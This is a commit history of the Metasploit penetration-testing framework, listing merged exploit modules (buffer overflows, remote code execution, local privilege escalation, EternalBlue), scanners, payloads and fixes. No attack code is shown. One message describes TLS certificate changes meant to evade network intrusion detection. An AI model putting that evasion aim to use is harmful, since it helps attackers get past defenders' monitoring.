Compare commits

...

1415 Commits

Author SHA1 Message Date
William Vu 3fd2862f76 Land #9639, multi/handler exit on disabled handler
If DisablePayloadHandler is set, abort instead of hanging.
2018-03-01 07:48:02 -08:00
Metasploit 096ca90953 Bump version of framework to 4.16.43 2018-03-01 07:32:21 -08:00
Sonny Gonzalez 667cc5bcca Land #9653, fix Y2k38 issue (until Jan 1, 2038) 2018-03-01 09:28:11 -06:00
Jeffrey Martin 789034a06c Land #9638, treat 'password must change' as a successful login 2018-02-28 13:25:22 -08:00
h00die b2f112fd2b Land #9641 spelling fix for wmap rc 2018-02-28 08:50:01 -08:00
William Vu fac7f3d5be Fix #9602, a little defensive programming
Check for a nil message and unnecessary auth failures while looping.
2018-02-26 18:08:37 -06:00
Brent Cook 95a5ebc1e7 Land #9629, decouple hosts and targets for tests 2018-02-26 16:07:16 -08:00
Wei Chen 735fbc5c9f Land #9623, Support Win 2008/7+ for enum_ms_product_keys
Land #9623
2018-02-25 23:25:03 -08:00
h00die fc8cafe81a Land #9310 docs for many aux scanners 2018-02-25 23:25:02 -08:00
Brent Cook bffba1e5e3 Land #9607, upgrade osx shells to osx meterpreter 2018-02-25 23:25:02 -08:00
Metasploit 3021a3202b Bump version of framework to 4.16.42 2018-02-23 08:57:01 -08:00
William Vu 0a5e9d922f Land #9601, ms17_010_eternalblue reliability fixes 2018-02-23 08:31:02 -08:00
Brent Cook 2af4f56382 Land #9611, Fix bug causing all OWA logins to appear valid 2018-02-23 08:31:01 -08:00
bwatters-r7 ac6fede928 Land #9441, Create exploit for AsusWRT LAN RCE
Merge branch 'land-9441' into upstream-master
2018-02-23 08:31:01 -08:00
Metasploit c7cd9ca395 Bump version of framework to 4.16.41 2018-02-22 10:05:34 -08:00
Brent Cook fd029eda62 lock ruby_smb to 0.0.18 to match master 2018-02-22 11:13:12 -06:00
Jacob Robles 178afdaed1 Land #9604, Fix logged errors when running without Python 3.6 / gmpy2 2018-02-22 08:27:37 -08:00
Brent Cook a189673782 Land #9584, Fix reverse_php_ssl infinite loop 2018-02-22 08:27:36 -08:00
Brent Cook 826b986018 Land #9602, Create sessions with the Fortinet SSH backdoor scanner 2018-02-22 08:27:36 -08:00
Brent Cook 4e8fe54c6c Land #9524, prefer 'shell' channels over 'exec' channels for ssh CommandStream 2018-02-22 08:27:36 -08:00
William Vu c1d701f656 Land #9593, finger_users regex fix 2018-02-22 08:27:35 -08:00
Aaron Soto dc913b60e4 Land #9444 - hsts_eraser module and docs 2018-02-22 08:27:35 -08:00
Jacob Robles 40220b5ab6 Land #9594, CloudMe Sync v1.10.9 Buffer Overflow 2018-02-22 08:27:35 -08:00
Jacob Robles 72cb9f358e Land #9561, Disk Savvy Enterprise v10.4.18 built-in server buffer overflow 2018-02-22 08:27:34 -08:00
Brent Cook eb54ae4ec0 Land #9589, add some more payload specs 2018-02-20 10:18:22 -08:00
Brent Cook 3635a92f5a Land #9588, Fix silent fail on missing argument to wmap_sites -d idx 2018-02-20 09:24:55 -06:00
Brent Cook af8736cad6 Land #9585, fix ctrl-D handling with block continuation 2018-02-20 09:24:54 -06:00
Brent Cook 72efbb9534 Land #9583, move osx stage binary 2018-02-20 09:24:54 -06:00
Brent Cook d614e06bfa Land #8997, add local 'ls' support to Meterpreter sessions 2018-02-20 09:24:54 -06:00
Brent Cook 59a41f04f7 Land #9366, Add x64 staged Meterpreter for macOS 2018-02-20 09:24:41 -06:00
Brent Cook 8c2484d2da Land #9164, add OWA 2016 support 2018-02-20 09:24:13 -06:00
Chris Higgins d2c203bcb9 Lands #9504, MagniComp SysInfo privilege escalation 2018-02-20 09:24:13 -06:00
Brent Cook 13c8072bca Land #9505, Support local knowledge base documents 2018-02-20 09:24:12 -06:00
Brent Cook 5dede95e98 Land #9270, Implement plugin API for hooking database events 2018-02-20 09:24:12 -06:00
Brent Cook 2395f839d0 Land #9507, Expand paths for meterpreter's cp, mv, and rm commands 2018-02-20 09:24:12 -06:00
Brent Cook a27b2bff3c Land #9443, Add warning to FileDropper for deleting CWD 2018-02-20 09:24:11 -06:00
Brent Cook f581942c7f Land #9575, Fix wmap_sites -a exception on missing url 2018-02-18 20:27:53 -08:00
Brent Cook b3962c73b0 Land #9573, fixes for bind_named_pipe 2018-02-18 20:27:53 -08:00
Brent Cook 2d10a9a201 Land #9568, handle mismatch uid/gids in docker images 2018-02-18 20:27:53 -08:00
Brent Cook 0b719772cb Land #9572, add bind_named_pipe tests 2018-02-18 15:32:11 -08:00
Brent Cook d89a8c3eb9 Land #9571, specify a python encoding for the claymore DoS module 2018-02-16 15:34:49 -08:00
Brent Cook f055bccc2a Land #9570, properly handle when there is no stat callback specified on upload 2018-02-16 15:34:49 -08:00
Brent Cook 51a685bcc7 Land #9516, Support Bash-Style Continuation Lines 2018-02-16 15:34:48 -08:00
Brent Cook d2e71cfc8b Land #9512, Add Claymore Dual GPU Miner<= 10.5 DoS module 2018-02-16 15:34:48 -08:00
Brent Cook 60e37e1c78 Land #9562, avoid an error with aux module command dispatcher 2018-02-16 15:34:48 -08:00
Brent Cook 31ed50ac92 Land #9539, add bind_named_pipe transport to Windows meterpreter 2018-02-16 15:34:47 -08:00
Wei Chen 004e228a52 Land #9509, Ulterius Server < v1.9.5.0 Directory Traversal
Land #9509
2018-02-16 15:34:47 -08:00
Brent Cook e8ad3a98e9 Land #9558, Fix #9417, map timeout exp to a var for telnet_encrypt_overflow 2018-02-15 14:14:07 -08:00
Brent Cook b9a8f227fb Land #9533, Add output file support to the vulns command 2018-02-15 14:14:07 -08:00
Brent Cook 87dcb13413 update magic numbers 2018-02-15 15:25:47 -06:00
Brent Cook 1045c1fc11 Land #9564, honoring retry counts for x86/64 Windows reverse_tcp payloads 2018-02-15 13:22:56 -08:00
Brent Cook c5a73bdea3 Land #9563: improve memory usage on meterpreter file upload 2018-02-15 13:22:55 -08:00
Brent Cook 7cde510eb6 Land #9560, Fix undef method 'gsub' in bavision_cam_login 2018-02-15 13:22:55 -08:00
Metasploit 358954e15c Bump version of framework to 4.16.40 2018-02-15 10:03:12 -08:00
Brent Cook 0cee8485d0 Land #9557, add back udp_probe for now 2018-02-14 11:26:59 -08:00
Spencer McIntyre bdc0b47844 Land #9552, add private_type for stored tomcat pw
Fixes #9513
2018-02-13 19:55:54 -08:00
Jeffrey Martin aecc1f143f Land #7699, Add UDP handlers and payloads (redux) 2018-02-13 14:46:07 -08:00
Jacob Robles f281b45384 Land #9546, Correct Typo 2018-02-13 14:46:07 -08:00
Jacob Robles e485b152e3 Land #9542, Correct Typo 2018-02-13 14:46:06 -08:00
Jeffrey Martin 1126acb201 Land #9543, bump gems, remove rbnacl/ffi since unneeded 2018-02-12 11:57:18 -06:00
h00die 37cb2d77e7 Land #9422 abrt race condition priv esc on linux 2018-02-12 11:55:21 -06:00
Pearce Barry 6c3168c541 Land #9536, Add Ubuntu notes to documentation 2018-02-12 11:55:19 -06:00
Pearce Barry 73bcec5d11 Land #9408, Add Juju-run Agent Privilege Escalation module (CVE-2017-9232) 2018-02-12 11:55:19 -06:00
h00die 090f7c8bd6 Land #9467 linux priv esc against glibc origin 2018-02-12 11:55:19 -06:00
Wei Chen 72ed11574b Land #9532, Fix a bug in the MD docs references
Land #9532
2018-02-12 11:55:18 -06:00
h00die cd7187023c Land #9469 linux local exploit for glibc ld audit 2018-02-12 11:55:18 -06:00
Brent Cook 32bd516e70 Land #9525, Update mysql_hashdump for MySQL 5.7 and above 2018-02-12 11:55:17 -06:00
Jacob Robles 656eb1150a Land #9489, Add scanner for the Bleichenbacker oracle (AKA: ROBOT) 2018-02-09 16:11:57 -06:00
Metasploit 55ae1f7bbe Bump version of framework to 4.16.39 2018-02-09 09:49:50 -08:00
Pearce Barry 4d4538dceb Merge pull request #9531 from pbarry-r7/4.x-pick-up-ROBOT
Cherry-pick from master for 4.x (pick up ROBOT).  Using green GH button because I effed up my cmdline...  :/
2018-02-09 11:37:16 -06:00
Adam Cammack cd723ac86e Add scanner for Bleichenbacher oracle (ROBOT) 2018-02-09 11:14:30 -06:00
Adam Cammack b0da7fcd26 Add Enum-type options for external modules 2018-02-09 11:14:21 -06:00
Adam Cammack 0fe2fb9186 Add support for single-IP external scanners 2018-02-09 11:14:14 -06:00
Metasploit a7e779d987 Bump version of framework to 4.16.38 2018-02-08 10:04:59 -08:00
Brent Cook b696665adc Land #9478, Improve Dup Scout BOF exploit 2018-02-08 10:25:39 -06:00
Brent Cook 909b787a56 Land #9521, flush pipe buffers when a process exists in mettle 2018-02-08 10:25:25 -06:00
h00die 5457cec81c Land #9493 updates to various docs 2018-02-06 23:33:58 -06:00
scriptjunkie 64c0d60fbf Land #9492, fix for reverse port forwards 2018-02-06 23:33:52 -06:00
Matthew Kienow 49c9b3cf1e Land #9491, remove extra HTML from doc templates 2018-02-06 23:33:51 -06:00
Adam Cammack e82ff28374 Land #9490, Fix HTML escaping of Unicode in docs 2018-02-06 23:33:34 -06:00
Metasploit 1fdc4bdabb Bump version of framework to 4.16.37 2018-02-02 09:51:35 -08:00
William Vu 6c350be24e Land #9473, new MS17-010 aux and exploit modules 2018-02-02 11:32:40 -06:00
h00die 016af01fd8 Land #9399 a linux priv esc against apport and abrt 2018-02-02 11:32:29 -06:00
Brent Cook ce3d5d77e4 Land #9481, Update native DNS spoofer for Dnsruby 2018-02-02 11:32:18 -06:00
Brent Cook ec12d61702 Land #9354, Debut embedded httpd server (Brother printers) DoS 2018-02-02 11:31:59 -06:00
Metasploit 445b72fdcd Bump version of framework to 4.16.36 2018-02-01 10:03:16 -08:00
Brent Cook 48c3c7cd62 Land #9475, Fix import for Fix proxy authentication in reverse_http 2018-02-01 11:24:10 -06:00
bwatters-r7 64746d8325 Land # 9407, Add BMC Server Automation RSCD Agent RCE exploit module
Merge branch 'land-9407' into upstream-master
2018-02-01 11:23:59 -06:00
h00die b7fbffa331 Land #9445 fixes for ssl labs scanner module 2018-02-01 11:23:46 -06:00
Jacob Robles 4fa68f29d9 Land #9457, Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow 2018-02-01 11:23:26 -06:00
Christian Mehlmauer a9d4a98d80 Land #9470, Update docker image dependencies
fix #8211
2018-02-01 11:22:51 -06:00
Metasploit cca76d2217 Bump version of framework to 4.16.35 2018-01-26 16:18:28 -08:00
William Vu bff02efad4 Land #9466, metasploit-payloads bump to 1.3.28 2018-01-26 18:09:20 -06:00
Aaron Soto 395320ba97 Land #9379, Oracle Weblogic RCE exploit and documentation 2018-01-26 18:08:56 -06:00
William Vu a87ae41d81 Land #9446, Post API fix for setuid_nmap 2018-01-26 18:08:47 -06:00
Jeffrey Martin 0d98135fcb Land #9462, add missing payload tests 2018-01-26 18:08:34 -06:00
Metasploit c2379308cf Bump version of framework to 4.16.34 2018-01-25 10:04:45 -08:00
bwatters-r7 af0c58c2ae Land #9335, Added socket bind port option for reverse tcp payload.
Merge branch 'land-9335' into upstream-master
2018-01-24 17:20:14 -06:00
Matthew Kienow b515a582f0 Land #9424, Add SharknAT&To external scanner 2018-01-24 17:20:03 -06:00
Brent Cook 25652c6c17 add missing gemfile.lock update 2018-01-24 17:19:06 -06:00
Pearce Barry 926ce42a01 Land #8632, colorado ftp fixes 2018-01-24 17:13:20 -06:00
bwatters-r7 2ea9ab2625 Land #9416, Sync Breeze Enterprise 9.5.16 Import Command buffer overflow
Merge branch 'land-9416' into upstream-master
2018-01-24 17:13:16 -06:00
Adam Cammack a4022f7b8f Land #9430, Improve Hyper-V checkvm checks 2018-01-24 17:13:12 -06:00
bwatters-r7 06b702e86b Land #9449, bump metasploit-payloads from 1.3.25 to 1.3.27
rapid7/metasploit-payloads#264
rapid7/metasploit-payloads#263

Merge branch 'land-9449' into upstream-master
2018-01-24 17:13:08 -06:00
bwatters-r7 8f2de5cd41 Land #9205, Documentation for Kaltura <= 13.1.0 RCE (CVE-2017-14143)
Merge branch 'land-9205' into upstream-master
2018-01-24 17:13:05 -06:00
bwatters-r7 a136841794 Land #9114, Add module for Kaltura <= 13.1.0 RCE (CVE-2017-14143)
Merge branch 'land-9114' into upstream-master
2018-01-24 17:13:00 -06:00
Brent Cook 15f631dcb5 Land #9452, expose linux/osx meterpreter process hiding 2018-01-24 17:12:56 -06:00
Brent Cook d6beb94c59 Land #6611, add native DNS to Rex, MSF mixin, sample modules 2018-01-24 17:12:52 -06:00
Brent Cook 5ec3da843e Land #9349, GoAhead LD_PRELOAD CGI Module 2018-01-24 17:12:47 -06:00
Brent Cook 294a8e0ada Land #9413, Expand the number of class names searched when checking for an exploitable JMX server 2018-01-24 17:12:43 -06:00
Brent Cook bb73d2c07e Land #9431, Fix owa_login to handle inserting credentials for a hostname 2018-01-24 17:12:39 -06:00
Brent Cook 47682e3f37 Land #9404, update module author 2018-01-24 17:12:34 -06:00
Brent Cook 5fc1988d63 Land #9398, allow UTF-8 module names and authors 2018-01-24 17:12:30 -06:00
Wei Chen ab610f599b Land #9442, Remove NoMethod Rescue for cerberus_sftp_enumusers
Land #9442
2018-01-24 17:12:25 -06:00
William Vu 7da3bdd081 Land #9432, cmd_edit improvements (again!)
We seem to enjoy refactoring this method.
2018-01-24 17:12:20 -06:00
Wei Chen 10fafb62bb Land #9436 - Fix cerberus_sftp_enumusers undefined method start for nil
Land #9436

Thanks Steve!
2018-01-24 17:12:16 -06:00
Brent Cook 512192d3b0 Land #9267, Add targets to sshexec 2018-01-24 17:12:12 -06:00
Brent Cook 55c345418d Land #9438, address cmd_exec inconsistencies 2018-01-24 17:11:40 -06:00
Brent Cook b8fc2c0213 Land #9389, Update commvault_cmd_exec module documentation 2018-01-24 17:11:34 -06:00
Brent Cook 23619431aa update stageless python sizes 2018-01-24 17:08:51 -06:00
Brent Cook 0916d8402e fix whitespace patchups for current python meterpreter 2018-01-24 17:08:33 -06:00
Jeffrey Martin bf6540585f lock google-protobuf and grpc on 4.x 2018-01-19 16:15:09 -06:00
Metasploit 898aa82933 Bump version of framework to 4.16.33 2018-01-18 10:05:22 -08:00
Brent Cook d6e966b079 Land #9414, wp_admin_shell_upload - remove plugin dir after exploitation 2018-01-16 21:08:22 -06:00
William Vu 77e76a80a1 Land #9419, grammar fixes for modules and docs 2018-01-15 23:25:48 -06:00
Brady Sullivan 593813cdef Fix small grammar issues in ms08_067 and ms17_010
Also includes very small changes to improve punctuation consistency
within CONTRIBUTING.md
2018-01-15 19:32:44 -08:00
William Vu e5bd36da1c Land #9402, NIS bootparamd domain name disclosure 2018-01-15 15:36:00 -06:00
Christian Mehlmauer 2f9eebe28b remove plugin dir 2018-01-15 14:48:59 +01:00
William Vu 736d438813 Address second round of feedback
Brain fart on guard clauses when I've been using them all this time...
Updating the conditions made the ternary fall out of favor.

Changed some wording in the doc to suggest the domain name for a
particular NIS server may be different from the bootparamd client's
configuration.
2018-01-13 22:55:01 -06:00
William Vu 1a8eb7bf2a Update nis_ypserv_map after bootparam feedback
Yes, yes, I see the off-by-one "error." It's more accurate this way.
Basically, we want to ensure there's actually data to dump.
2018-01-13 15:40:17 -06:00
William Vu c080329ee6 Update module after feedback
Looks like I can't decide on certain style preferences.

Not keen on using blank?, but I've used it before. Time to commit?

Also, fail_with has been fixed for aux and post since #8643. Use it!
2018-01-13 15:40:11 -06:00
William Vu eb8429cbd3 Revert "umlaut"
This reverts commit ffd7073420.
2018-01-12 22:57:22 -06:00
Brendan Coles ffd7073420 umlaut 2018-01-13 15:48:45 +11:00
Jeffrey Martin 1f1dc59d17 Land #9392, python meterpreter whitespace normalization 2018-01-12 21:24:13 -06:00
William Vu ff1c85552b Add module doc 2018-01-12 19:34:59 -06:00
William Vu 2916c5ae45 Rescue Rex::Proto::SunRPC::RPCTimeout
Coincidentally, this also fixes the rescue in the library, since
rescuing Timeout instead of Timeout::Error does nothing.
2018-01-12 19:34:59 -06:00
William Vu 0c9f1d71d3 Add NIS bootparamd domain name disclosure 2018-01-12 19:34:53 -06:00
sinn3r 72d39d3186 Merge pull request #9400 from Agahlot/master
Small Typo
2018-01-12 09:36:53 -06:00
Agahlot 488f27bf76 Small Typo 2018-01-12 07:05:30 -05:00
Wei Chen e6c4fb1dab Land #9269, Add a new target for Sync Breeze Enterprise GET BoF
Land #9269
2018-01-11 16:54:23 -06:00
Wei Chen f395e07fc6 Land #9269, add new target for Sync Breeze Enterprise GET BoF
Land #9269
2018-01-11 16:53:02 -06:00
Metasploit 18f16e7c66 Bump version of framework to 4.16.32 2018-01-11 10:03:16 -08:00
William Vu 4b225c30fd Land #9368, ye olde NIS ypserv map dumper 2018-01-10 22:02:36 -06:00
William Vu 1a8ffed5e3 Land #9369, register_dir{,s}_for_cleanup 2018-01-10 22:02:15 -06:00
William Vu b1cecd4193 Bump TIMEOUT in Msf::Exploit::Remote::SunRPC 2018-01-10 20:36:35 -06:00
William Vu f66b11f262 Nix an unneeded variable declaration 2018-01-10 20:24:02 -06:00
William Vu f5210ed6d6 Update module doc with missing options 2018-01-10 20:18:50 -06:00
Wei Chen 6510ee53bc Land #9204, Add exploit for Samsung SRN-1670D (CVE-2017-16524)
Land #9204
2018-01-10 20:15:29 -06:00
Wei Chen 18c179a091 Update module and add documentation
This updates the module to pass:

* msftidy
* Ruby style guidelines
* Proper usage of Metasploit API
* Mostly other cosmetic fixes

A documentation is also added.
2018-01-10 20:13:42 -06:00
William Vu 1c1f3b161e Rescue XDR errors in Msf::Exploit::Remote::SunRPC 2018-01-10 20:11:30 -06:00
William Vu b66889ac86 Rescue additional errors and refactor code
https://jvns.ca/blog/2015/11/27/why-rubys-timeout-is-dangerous-and-thread-dot-raise-is-terrifying/
2018-01-10 20:11:25 -06:00
Wei Chen 7e2c7837e5 Land #9325, Add CVE-2017-6090 phpCollab 2.5.1 file upload exploit module
Land #9325
2018-01-10 17:39:50 -06:00
Wei Chen b1f3f471f3 Update phpcollab_upload_exec code (also module documentation) 2018-01-10 17:38:52 -06:00
Wei Chen dd737c3bc8 Land #9317, remove multiple deprecated modules
Land #9317

The following modules are replaced by the following:

auxiliary/scanner/discovery/udp_probe
is replaced by:
auxiliary/scanner/discovery/udp_sweep

exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload
is replaced by:
exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload

exploit/windows/misc/regsvr32_applocker_bypass_server
is replaced by:
exploits/multi/script/web_delivery
2018-01-10 15:47:20 -06:00
Wei Chen 8d77f35b16 Land #9373, Add LabF nfsAxe FTP Client 3.7 Stack Buffer Overflow
Land #9373
2018-01-09 22:40:50 -06:00
Wei Chen 25280e3319 Update labf_nfsaxe and module documentation 2018-01-09 22:39:40 -06:00
Brent Cook f125e13278 python meterpreter whitespace normalization 2018-01-09 16:08:52 -05:00
Wei Chen 777e383568 Land #9377, Add HPE iMC dbman RestoreDBase Unauthenticated RCE exploit
Land #9377
2018-01-09 13:56:53 -06:00
Wei Chen a0c9cdd73d Land #9376, Add HPE iMC dbman RestartDB Unauthenticated RCE exploit
Land #9376
2018-01-09 13:28:03 -06:00
Brent Cook cb82015c87 Land #9387, Check exploit stance for array as well as string 2018-01-09 03:52:59 -05:00
Brent Cook 573ee28631 Land #9378, Detect and return on bad VNC negotiations 2018-01-09 03:46:00 -05:00
William Vu f1bb3feb34 Land #9388, update LICENSE and COPYING 2018-01-09 00:01:49 -06:00
William Vu 4849c6cdf1 Update COPYING 2018-01-09 00:01:35 -06:00
William Vu bbad416a86 Add module doc to appease the @h00die god 2018-01-08 15:02:39 -06:00
William Vu 4a5a17a8e1 Add NIS ypserv map dumper 2018-01-08 14:27:53 -06:00
Aaron Meese 463d9b836b Update LICENSE
Updated year
2018-01-08 14:17:44 -06:00
William Vu 333d57461a Check exploit stance for array as well as string
An exploit can be both aggressive and passive.
2018-01-08 13:52:04 -06:00
Wei Chen 693a12e307 Land #9384, Add mkienow to the mailmap file
Land #9384
2018-01-07 20:35:01 -06:00
Matthew Kienow 3c23fda36a Add mkienow to the mailmap 2018-01-07 18:00:21 -05:00
Wei Chen a633caf734 Land #9382, Add Aaron to mailmap
Land #9382
2018-01-07 12:22:09 -06:00
Wei Chen d138f1508c Land #9340, Add exploit for Commvault Remote Command Injection
Land #9340
2018-01-07 12:17:26 -06:00
Daniel Teixeira ff1806ef5f Update labf_nfsaxe.rb 2018-01-07 16:46:06 +00:00
Pearce Barry 340cd66b7c Add Aaron to the mailmap. Woo! 2018-01-06 22:37:30 -06:00
William Vu 461f1c12e6 Fix nil bug(s) by moving arrays to initialize 2018-01-06 02:31:16 -06:00
William Vu 14143c2b90 Fix missed file_dropper_win_path 2018-01-06 01:44:25 -06:00
Brendan Coles a1a594d1f8 Add documentation 2018-01-06 05:09:24 +00:00
Brendan Coles 9ec17bdd54 Add documentation 2018-01-06 05:08:33 +00:00
Daniel Teixeira a69f275a39 Update labf_nfsaxe.rb 2018-01-05 21:14:47 +00:00
Daniel Teixeira c819aebc76 Add files via upload 2018-01-05 21:11:21 +00:00
Daniel Teixeira 3fd13b86c3 Add files via upload 2018-01-05 21:02:18 +00:00
Daniel Teixeira e797ca4781 Add files via upload 2018-01-05 21:00:47 +00:00
Daniel Teixeira aca76e2a4e Update labf_nfsaxe.rb 2018-01-05 20:58:36 +00:00
Daniel Teixeira 2643acbc25 Update labf_nfsaxe.rb 2018-01-05 20:55:49 +00:00
Daniel Teixeira b29710c66b Add files via upload 2018-01-05 20:47:27 +00:00
Daniel Teixeira d34541aebd Update labf_nfsaxe.rb 2018-01-05 20:44:40 +00:00
Daniel Teixeira 05dc90c615 Update labf_nfsaxe.rb 2018-01-05 20:44:38 +00:00
Daniel Teixeira 94a1198485 Update labf_nfsaxe.rb 2018-01-05 20:41:49 +00:00
Daniel Teixeira b97785c7a9 Update labf_nfsaxe.rb 2018-01-05 18:46:33 +00:00
Daniel Teixeira e7946549d7 Update labf_nfsaxe.rb 2018-01-05 18:31:40 +00:00
jgor 51e5fb450f Detect and return on bad VNC negotiations 2018-01-05 10:12:13 -06:00
Brendan Coles 006514864b Add HPE iMC dbman RestoreDBase Unauthenticated RCE exploit 2018-01-05 11:28:48 +00:00
Brendan Coles 52a5fc9e0a Add HPE iMC dbman RestartDB Unauthenticated RCE exploit 2018-01-05 11:28:14 +00:00
Wei Chen 9fbddd6474 Land #9374, fix HTML parsing problems for info -d
Land #9374
2018-01-04 16:08:56 -06:00
Daniel Teixeira a3fb8b6619 Update labf_nfsaxe.rb 2018-01-04 20:55:38 +00:00
Matthew Kienow 67e7ea4df9 Fix markdown premature less-than sign escape 2018-01-04 15:51:05 -05:00
Daniel Teixeira e5bb4bf057 Add files via upload 2018-01-04 20:26:28 +00:00
Daniel Teixeira 160f960f78 Add files via upload 2018-01-04 20:25:41 +00:00
Metasploit 3a7a539c84 Bump version of framework to 4.16.31 2018-01-04 12:17:08 -08:00
Jeffrey Martin 78872be2ad Merge released '4.x' 2018-01-04 14:13:18 -06:00
h00die 65f444ddcc land #9362 exploit for pfsense graph injection 2018-01-04 14:35:52 -05:00
wetw0rk c9d6d0a7a7 -51 2018-01-04 12:25:31 -06:00
Metasploit d4de9eef9b Bump version of framework to 4.16.30 2018-01-04 10:03:21 -08:00
William Vu 50f4ebb3b2 Add register_dirs_for_cleanup to FileDropper 2018-01-04 11:06:32 -06:00
William Vu d7c826b5e8 Add rm_rf to Post::File 2018-01-03 23:14:21 -06:00
William Vu 366a20a4a4 Fix #9215, minor style nitpick 2018-01-03 23:11:51 -06:00
Brent Cook 520e890520 Land #8581, VMware Workstation ALSA Config File Local Privilege Escalation 2018-01-03 21:35:57 -06:00
Wei Chen b8dde2e650 Land #9360, Ayukov NFTP FTP client buffer overflow vulnerability
Land #9360
2018-01-03 20:56:12 -06:00
Wei Chen 04cf3017c0 Update ayukov_nftp exploit and module documentation 2018-01-03 20:52:57 -06:00
Aaron Soto 7849155347 Land #9359, Improve DCE/RPC fault handling 2018-01-03 20:42:17 -06:00
William Vu c3f10c1d57 Land #9336, Linksys WVBR0-25 exploit 2018-01-03 18:13:44 -06:00
headlesszeke 589de0483b Clarification in product linkage and small syntax fixup in repro steps 2018-01-03 17:00:26 -06:00
dmohanty-r7 a5fa63405f Land #9206, Add Xplico RCE exploit module 2018-01-03 16:02:51 -06:00
Adam Cammack 16fa3b99ef Land #9350, Improve fake SSL cert details 2018-01-03 15:32:27 -06:00
Adam Cammack a98de2d9a3 Land #9358, Support password protected key files 2018-01-03 15:12:28 -06:00
William Vu a1d43c8f33 Land #9215, new Drupageddon vector 2018-01-03 14:45:32 -06:00
William Vu 84c951cc1d Land #8059, Postfixadmin alias modification module 2018-01-03 14:29:49 -06:00
wetw0rk 16d709f180 changes+filedropper 2018-01-03 14:09:30 -06:00
Brent Cook 70fbcc3ea8 Land #9280, add initial module automation tests 2018-01-03 10:47:24 -06:00
headlesszeke 3b0f0aa358 Adding doc file for module linksys_wvbr0_user_agent_exec_noauth 2018-01-02 14:54:18 -06:00
wetw0rk 8f0e41e159 requested changes 2018-01-01 17:30:43 -06:00
wetw0rk bc088cb379 added md 2018-01-01 05:46:04 -06:00
wetw0rk c47d09717d pfsense graph sploit 2018-01-01 03:18:51 -06:00
Daniel Teixeira 3af27a04e0 Update ayukov_nftp.rb 2017-12-31 17:48:37 +00:00
Daniel Teixeira 67357e316b Update ayukov_nftp.rb 2017-12-31 17:48:23 +00:00
Daniel Teixeira 10b2833e7c Update ayukov_nftp.rb 2017-12-31 17:00:17 +00:00
Daniel Teixeira 21717ae0a2 Create ayukov_nftp.rb 2017-12-31 15:43:16 +00:00
Daniel Teixeira 76d345039d Create ayukov_nftp.md 2017-12-31 15:42:32 +00:00
bka-dev 086f657c56 Fix early termination of auxiliary/scanner/dcerpc/hidden
This commit fixes an issue, where auxiliary/scanner/dcerpc/hidden terminates directly, once an endpoint can't be reached or access is denied. Instead the next endpoint in list should be checked, instead of terminating directly.
2017-12-31 14:41:33 +01:00
RageLtMan f2a8d68a1f Permit encrypted SSH keys for login scanner
Net::SSH::KeyFactory permits loading keys using a passphrase.
The Framework SSH modules were implemented back when we had a fork
of net-ssh in our tree, and can now use functionality provided by
the upstream gem.
Update the ssh key login scanner to add a KEY_PASS datastore
OptString which is then passed to the KeyCollection class and used
in the updated :read_key method which now calls the KeyFactory to
read data and give us the appropriate String representation of the
key in the KeyCollection's cache.
A bit of cleanup performed as well, removing legacy code paths no
longer hit by the module. Shamelessly added self to authors, fair
amount of blood and sweat in the SSH subsystem over the years, hope
nobody objects.

Testing:
  None yet
2017-12-31 02:53:06 -05:00
Brendan Coles c153788424 Remove sleeps 2017-12-30 15:20:56 +00:00
Jan-Frederik Rieckers 7f3df74134 fixup! Adding Module for Postfixadmin CVE-2017-5930
Add error handling if request fails

Fix a typo in doc, add default value to doc
2017-12-30 13:04:23 +01:00
Matthew Kienow 2b96f8e272 Land #9353, Implement CommandShellCleanupCommand 2017-12-29 17:06:28 -05:00
h00die 3516305517 land #9191 an exploit against HP LoadRunner magentproc 2017-12-29 16:35:43 -05:00
h00die 4dacc70b9a slight updates to magentproc docs 2017-12-29 16:35:12 -05:00
h00die b698095c49 slight updates to magentproc docs 2017-12-29 16:30:32 -05:00
Brent Cook a444bdb329 handle no datastore 2017-12-29 15:26:28 -06:00
Jeffrey Martin bb97467b31 docs for auxiliary/scanner/http/directadmin_login 2017-12-29 14:43:20 -06:00
Brent Cook 198aeda2c8 rename option 2017-12-29 12:31:56 -06:00
Brent Cook e546598cf1 Implement a method for command shells to register a post-session cleanup command 2017-12-29 12:14:34 -06:00
Jan-Frederik Rieckers 289e887895 Adding Module for Postfixadmin CVE-2017-5930
This exploit allows domain admins to delete protected aliases.
It can be used to redirect aliases like abuse@domain and can aid in
further attacks.
2017-12-29 17:13:59 +01:00
RageLtMan c32ef4a3be Require msf/core/cert_provider in framework.rb
Add an explicit require for the new cert_provider in framework.rb
in case it has not yet been loaded.

This should address the Travis failure on initial PR, although the
gem version in socket has not been updated, so this might take a
bit to propagate. In the end, if the dependency already gives us
this functionality by the time we call Rex::Socket::Ssl then this
commit can safely be dropped
2017-12-29 02:14:48 -05:00
Brent Cook 8de760f1f7 Land #9348, Only use basic auth in couchdb_enum when credentials are provided 2017-12-28 21:24:45 -06:00
RageLtMan 18f3815147 Update TLS certificate generation routines
Msf relies on Rex::Socket to create TLS certificates for services
hosted in the framework and used by some payloads. These certs are
flagged by NIDS - snort sid 1-34864 and such.

Now that Rex::Socket can accept a @@cert_provider from the Msf
namespace, a more robust generation routine can be used by all TLS
socket services, provided down from Msf to Rex, using dependencies
which Rex does not include.

This work adds the faker gem into runtime dependencies, creates an
Msf::Exploit::Remote::Ssl::CertProvider namespace, and provides
API compatible method invocations with the Rex version, but able
to generate higher entropy certs with more variables, options, etc.

This should reduce the hit rate against NIDS on the wire, reducing
pesky blue team interference until we slip up some other way. Also,
with the ability to generate different cert types, we may want to
look at extending this effort to probide a more comprehensive key
oracle to Framework and consumers.

Testing:
  None yet, internal tests pending.
  Travis should fail as this requires rex-socket #8.
2017-12-28 21:00:03 -05:00
Metasploit 7254130b77 Bump version of framework to 4.16.29 2017-12-28 15:19:22 -08:00
Jeffrey Martin 66ca61f636 Merge released '4.x' 2017-12-28 17:15:29 -06:00
Pearce Barry e614e9b732 Land #9268, Update DiskBoss Module (EDB 42395) 2017-12-28 16:39:26 -06:00
Brent Cook 5e71be7772 add ard_root_pw documentation 2017-12-28 14:37:25 -06:00
Brent Cook c2bb144d0f Land #9302, Implement ARD auth and add remote CVE-2017-13872 (iamroot) module 2017-12-28 14:11:26 -06:00
Metasploit c681c7881d Bump version of framework to 4.16.28 2017-12-28 10:03:39 -08:00
Brent Cook 8c2c30c230 Land #9330, add MQTT scanner 2017-12-27 22:32:59 -06:00
